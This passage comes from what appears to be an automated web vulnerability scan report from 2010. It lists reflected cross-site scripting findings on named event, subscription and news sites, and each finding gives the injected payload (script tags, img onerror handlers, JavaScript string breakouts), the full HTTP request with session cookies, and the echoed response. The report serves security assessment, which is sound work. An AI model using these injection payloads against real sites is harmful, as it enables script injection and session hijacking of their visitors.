The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e64a7--><img%20src%3da%20onerror%3dalert(1)>c0d6bf373a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e64a7--><img src=a onerror=alert(1)>c0d6bf373a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /expo/event-testimonials.php/e64a7--><img%20src%3da%20onerror%3dalert(1)>c0d6bf373a3 HTTP/1.1
Host: www.cloudconnectevent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:30:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 30335
3.192. http://www.cloudconnectevent.com/expo/pr-opportunities.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/expo/pr-opportunities.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6d40a--><img%20src%3da%20onerror%3dalert(1)>6de357e3dab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d40a--><img src=a onerror=alert(1)>6de357e3dab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /expo/pr-opportunities.php/6d40a--><img%20src%3da%20onerror%3dalert(1)>6de357e3dab HTTP/1.1
Host: www.cloudconnectevent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:30:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 32754
3.193. http://www.cloudconnectevent.com/expo/request-info.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/expo/request-info.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 14b26--><img%20src%3da%20onerror%3dalert(1)>7f0ff82a534 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14b26--><img src=a onerror=alert(1)>7f0ff82a534 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /expo/request-info.php/14b26--><img%20src%3da%20onerror%3dalert(1)>7f0ff82a534 HTTP/1.1
Host: www.cloudconnectevent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:31:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 34362
3.194. http://www.cloudconnectevent.com/media-sponsors.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/media-sponsors.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload f8c8b--><img%20src%3da%20onerror%3dalert(1)>aca6cfde27e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8c8b--><img src=a onerror=alert(1)>aca6cfde27e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /media-sponsors.php/f8c8b--><img%20src%3da%20onerror%3dalert(1)>aca6cfde27e HTTP/1.1
Host: www.cloudconnectevent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:31:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 51943
3.195. http://www.cloudconnectevent.com/registration/faq.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/registration/faq.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 95792--><img%20src%3da%20onerror%3dalert(1)>0a7a9c6e9e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95792--><img src=a onerror=alert(1)>0a7a9c6e9e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /registration/faq.php/95792--><img%20src%3da%20onerror%3dalert(1)>0a7a9c6e9e1 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:27:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 31420
3.196. http://www.cloudconnectevent.com/registration/hotel-information.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cloudconnectevent.com
Path: /registration/hotel-information.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b9ad3--><img%20src%3da%20onerror%3dalert(1)>45b5968f374 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b9ad3--><img src=a onerror=alert(1)>45b5968f374 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /registration/hotel-information.php/b9ad3--><img%20src%3da%20onerror%3dalert(1)>45b5968f374 HTTP/1.1
Host: www.cloudconnectevent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:27:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 30787
The value of the K request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f9bf"%3balert(1)//c5f2d9f983a was submitted in the K parameter. This input was echoed as 2f9bf";alert(1)//c5f2d9f983a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ars/techweb/gettemplate.do?mode=gettemplate&P=1&F=1002254&K=NZHA2f9bf"%3balert(1)//c5f2d9f983a&cid=IW_NZHA HTTP/1.1
Host: www.cmpadministration.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:26:49 GMT
Set-Cookie: JSESSIONID=52ED9B97BFA8C2112D9A75540AEEB8D5.tomcat1; Path=/ars
Content-Type: text/html;charset=UTF-8
Connection: close
Set-Cookie: UBM-ARS=238132160.20480.0000; expires=Sun, 12-Dec-2010 01:32:03 GMT; path=/
Content-Length: 19427
<script> var pubcode = 'IK'; //version 1.2 command -2 Start var confirmQuitMsg = 'The InformationWeek Business Technology Network is FREE and allows you access to premium ...[SNIP]... <script language="JavaScript" >s.events = "event5";s.eVar16 = "IWK_Print";s.zip = "";s.state = "";s.eVar22 = "NZHA2F9BF";ALERT(1)//C5F2D9F983A";s.campaign = "";s.products = ";Informationweek New Subscription";s.eVar6 = "";s.eVar8 = "";s.eVar9 = "";s.eVar10 = "";var s_code=s.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the K request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cd2c"><script>alert(1)</script>f56568929f7 was submitted in the K parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /ars/techweb/gettemplate.do?mode=gettemplate&P=1&F=1002254&K=NZHA5cd2c"><script>alert(1)</script>f56568929f7&cid=IW_NZHA HTTP/1.1
Host: www.cmpadministration.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:26:48 GMT
Set-Cookie: JSESSIONID=A9A9771689176AD46F6CEB5467D36008.tomcat1; Path=/ars
Content-Type: text/html;charset=UTF-8
Connection: close
Set-Cookie: UBM-ARS=238132160.20480.0000; expires=Sun, 12-Dec-2010 01:32:02 GMT; path=/
Content-Length: 19457
<script> var pubcode = 'IK'; //version 1.2 command -2 Start var confirmQuitMsg = 'The InformationWeek Business Technology Network is FREE and allows you access to premium ...[SNIP]... <input type="hidden" name="K" value="NZHA5cd2c"><script>alert(1)</script>f56568929f7" /> ...[SNIP]...
3.199. http://www.darkreading.com/blog/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcfba"><script>alert(1)</script>6c2e3945f81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/?bcfba"><script>alert(1)</script>6c2e3945f81=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 204f7"><a>2afc7da3334 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700484204f7"><a>2afc7da3334/real-life-social-engineering.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8bd9"><a>4039b14a500 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700484/real-life-social-engineering.htmlf8bd9"><a>4039b14a500 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2765a'><img%20src%3da%20onerror%3dalert(1)>e9a2d414f57 was submitted in the REST URL parameter 3. This input was echoed as 2765a'><img src=a onerror=alert(1)>e9a2d414f57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700484/real-life-social-engineering.html2765a'><img%20src%3da%20onerror%3dalert(1)>e9a2d414f57 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
3.203. http://www.darkreading.com/blog/227700484/real-life-social-engineering.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/227700484/real-life-social-engineering.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78b7a"><script>alert(1)</script>db2f0dad75e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700484/real-life-social-engineering.html?78b7a"><script>alert(1)</script>db2f0dad75e=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de681"><a>3fe3823aebc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700498de681"><a>3fe3823aebc/finding-exposed-devices-on-your-network.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c424a"><a>e776e4b17a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700498/finding-exposed-devices-on-your-network.htmlc424a"><a>e776e4b17a1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a1359'><img%20src%3da%20onerror%3dalert(1)>db4383fd428 was submitted in the REST URL parameter 3. This input was echoed as a1359'><img src=a onerror=alert(1)>db4383fd428 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700498/finding-exposed-devices-on-your-network.htmla1359'><img%20src%3da%20onerror%3dalert(1)>db4383fd428 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Finding E ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/blog/227700498/finding-exposed-devices-on-your-network.htmla1359'><img src=a onerror=alert(1)>db4383fd428'> ...[SNIP]...
3.207. http://www.darkreading.com/blog/227700498/finding-exposed-devices-on-your-network.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f388"><script>alert(1)</script>60f81044a68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700498/finding-exposed-devices-on-your-network.html?4f388"><script>alert(1)</script>60f81044a68=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18b4d"><a>ee7ca451d93 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22770051018b4d"><a>ee7ca451d93/relying-on-tools-makes-you-dumber.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 165ec"><a>74d65ea8c93 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700510/relying-on-tools-makes-you-dumber.html165ec"><a>74d65ea8c93 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 65185'><img%20src%3da%20onerror%3dalert(1)>cb19eaf8a5f was submitted in the REST URL parameter 3. This input was echoed as 65185'><img src=a onerror=alert(1)>cb19eaf8a5f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700510/relying-on-tools-makes-you-dumber.html65185'><img%20src%3da%20onerror%3dalert(1)>cb19eaf8a5f HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Relying O ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/blog/227700510/relying-on-tools-makes-you-dumber.html65185'><img src=a onerror=alert(1)>cb19eaf8a5f'> ...[SNIP]...
3.211. http://www.darkreading.com/blog/227700510/relying-on-tools-makes-you-dumber.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e16e3"><script>alert(1)</script>4c2502febec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700510/relying-on-tools-makes-you-dumber.html?e16e3"><script>alert(1)</script>4c2502febec=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a362"><a>06eb3ea4e55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/2277005248a362"><a>06eb3ea4e55/virtual-machines-for-fun-profit-and-pwnage.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload edec8'><img%20src%3da%20onerror%3dalert(1)>deb97097fba was submitted in the REST URL parameter 3. This input was echoed as edec8'><img src=a onerror=alert(1)>deb97097fba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700524/virtual-machines-for-fun-profit-and-pwnage.htmledec8'><img%20src%3da%20onerror%3dalert(1)>deb97097fba HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32ec9"><a>cf08a1794b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700524/virtual-machines-for-fun-profit-and-pwnage.html32ec9"><a>cf08a1794b7 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
